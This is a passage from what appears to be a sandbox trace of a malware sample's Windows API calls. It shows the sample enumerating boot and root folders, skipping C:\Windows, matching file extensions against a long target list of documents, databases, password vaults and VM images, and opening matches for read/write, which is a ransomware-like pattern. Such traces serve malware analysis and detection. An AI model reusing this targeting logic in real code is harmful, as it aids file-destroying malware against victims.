(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.812] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.812] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.812] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.812] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="memtest.exe" | out: pszDest="C:\\Boot\\memtest.exe") returned="C:\\Boot\\memtest.exe" [0039.812] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0039.812] wsprintfW (in: param_1=0x2e4ed78, param_2="%ws." | out: param_1=".exe.") returned 5 [0039.812] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0039.812] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.813] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="nb-NO" | out: pszDest="C:\\Boot\\nb-NO") returned="C:\\Boot\\nb-NO" [0039.813] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\nb-NO") returned 0x0 [0039.813] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\nb-NO", pszFile="*" | out: pszDest="C:\\Boot\\nb-NO\\*") returned="C:\\Boot\\nb-NO\\*" [0039.813] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.813] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.813] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.813] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\nb-NO", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned="C:\\Boot\\nb-NO\\bootmgr.exe.mui" [0039.813] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.814] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.814] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.814] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.814] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.814] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.814] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="nl-NL" | out: pszDest="C:\\Boot\\nl-NL") returned="C:\\Boot\\nl-NL" [0039.814] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\nl-NL") returned 0x0 [0039.814] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\nl-NL", pszFile="*" | out: pszDest="C:\\Boot\\nl-NL\\*") returned="C:\\Boot\\nl-NL\\*" [0039.814] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.841] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.841] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.841] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\nl-NL", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned="C:\\Boot\\nl-NL\\bootmgr.exe.mui" [0039.841] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.841] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.841] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.842] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.842] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.842] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.842] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="pl-PL" | out: pszDest="C:\\Boot\\pl-PL") returned="C:\\Boot\\pl-PL" [0039.842] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\pl-PL") returned 0x0 [0039.842] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\pl-PL", pszFile="*" | out: pszDest="C:\\Boot\\pl-PL\\*") returned="C:\\Boot\\pl-PL\\*" [0039.842] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.842] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.842] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.842] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\pl-PL", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned="C:\\Boot\\pl-PL\\bootmgr.exe.mui" [0039.843] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.843] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.843] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.843] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.843] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.843] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.843] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="pt-BR" | out: pszDest="C:\\Boot\\pt-BR") returned="C:\\Boot\\pt-BR" [0039.843] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\pt-BR") returned 0x0 [0039.843] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\pt-BR", pszFile="*" | out: pszDest="C:\\Boot\\pt-BR\\*") returned="C:\\Boot\\pt-BR\\*" [0039.843] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.844] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.844] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.844] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\pt-BR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned="C:\\Boot\\pt-BR\\bootmgr.exe.mui" [0039.844] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.844] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.845] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.845] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.845] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.845] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.845] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="pt-PT" | out: pszDest="C:\\Boot\\pt-PT") returned="C:\\Boot\\pt-PT" [0039.845] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\pt-PT") returned 0x0 [0039.845] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\pt-PT", pszFile="*" | out: pszDest="C:\\Boot\\pt-PT\\*") returned="C:\\Boot\\pt-PT\\*" [0039.845] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.845] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.845] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.845] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\pt-PT", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned="C:\\Boot\\pt-PT\\bootmgr.exe.mui" [0039.846] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.846] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.846] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.846] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.846] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.846] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.846] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="ru-RU" | out: pszDest="C:\\Boot\\ru-RU") returned="C:\\Boot\\ru-RU" [0039.846] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\ru-RU") returned 0x0 [0039.846] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\ru-RU", pszFile="*" | out: pszDest="C:\\Boot\\ru-RU\\*") returned="C:\\Boot\\ru-RU\\*" [0039.846] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.848] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.848] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.848] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\ru-RU", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned="C:\\Boot\\ru-RU\\bootmgr.exe.mui" [0039.848] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.848] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.848] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.848] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.848] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.848] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.848] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="sv-SE" | out: pszDest="C:\\Boot\\sv-SE") returned="C:\\Boot\\sv-SE" [0039.848] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\sv-SE") returned 0x0 [0039.848] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\sv-SE", pszFile="*" | out: pszDest="C:\\Boot\\sv-SE\\*") returned="C:\\Boot\\sv-SE\\*" [0039.848] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.849] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.849] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.849] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\sv-SE", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned="C:\\Boot\\sv-SE\\bootmgr.exe.mui" [0039.849] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.849] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.849] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.849] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.849] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.849] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.849] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="tr-TR" | out: pszDest="C:\\Boot\\tr-TR") returned="C:\\Boot\\tr-TR" [0039.849] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\tr-TR") returned 0x0 [0039.849] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\tr-TR", pszFile="*" | out: pszDest="C:\\Boot\\tr-TR\\*") returned="C:\\Boot\\tr-TR\\*" [0039.849] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.855] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.855] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.855] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\tr-TR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned="C:\\Boot\\tr-TR\\bootmgr.exe.mui" [0039.855] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.855] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.855] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.855] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.855] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.855] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.855] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="zh-CN" | out: pszDest="C:\\Boot\\zh-CN") returned="C:\\Boot\\zh-CN" [0039.855] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\zh-CN") returned 0x0 [0039.855] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\zh-CN", pszFile="*" | out: pszDest="C:\\Boot\\zh-CN\\*") returned="C:\\Boot\\zh-CN\\*" [0039.855] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.856] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.856] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.856] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\zh-CN", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned="C:\\Boot\\zh-CN\\bootmgr.exe.mui" [0039.856] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.856] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.856] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.856] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.856] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.856] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.856] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="zh-HK" | out: pszDest="C:\\Boot\\zh-HK") returned="C:\\Boot\\zh-HK" [0039.856] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\zh-HK") returned 0x0 [0039.856] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\zh-HK", pszFile="*" | out: pszDest="C:\\Boot\\zh-HK\\*") returned="C:\\Boot\\zh-HK\\*" [0039.856] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.858] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.858] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.859] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\zh-HK", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned="C:\\Boot\\zh-HK\\bootmgr.exe.mui" [0039.859] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.859] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.859] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.859] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.859] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.859] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.859] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="zh-TW" | out: pszDest="C:\\Boot\\zh-TW") returned="C:\\Boot\\zh-TW" [0039.859] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\zh-TW") returned 0x0 [0039.859] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\zh-TW", pszFile="*" | out: pszDest="C:\\Boot\\zh-TW\\*") returned="C:\\Boot\\zh-TW\\*" [0039.859] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.860] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.860] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.860] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\zh-TW", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned="C:\\Boot\\zh-TW\\bootmgr.exe.mui" [0039.860] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.860] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.860] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.860] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.860] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.860] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 0 [0039.860] FindClose (in: hFindFile=0x54ac60 | out: hFindFile=0x54ac60) returned 1 [0039.860] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.860] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="bootmgr" | out: pszDest="C:\\bootmgr") returned="C:\\bootmgr" [0039.860] PathFindExtensionW (pszPath="bootmgr") returned="" [0039.860] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.860] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="BOOTSECT.BAK" | out: pszDest="C:\\BOOTSECT.BAK") returned="C:\\BOOTSECT.BAK" [0039.860] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0039.860] wsprintfW (in: param_1=0x2e4f608, param_2="%ws." | out: param_1=".BAK.") returned 5 [0039.861] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".BAK.") returned=".bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip." [0039.861] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.861] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.861] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="Documents and Settings" | out: pszDest="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0039.861] 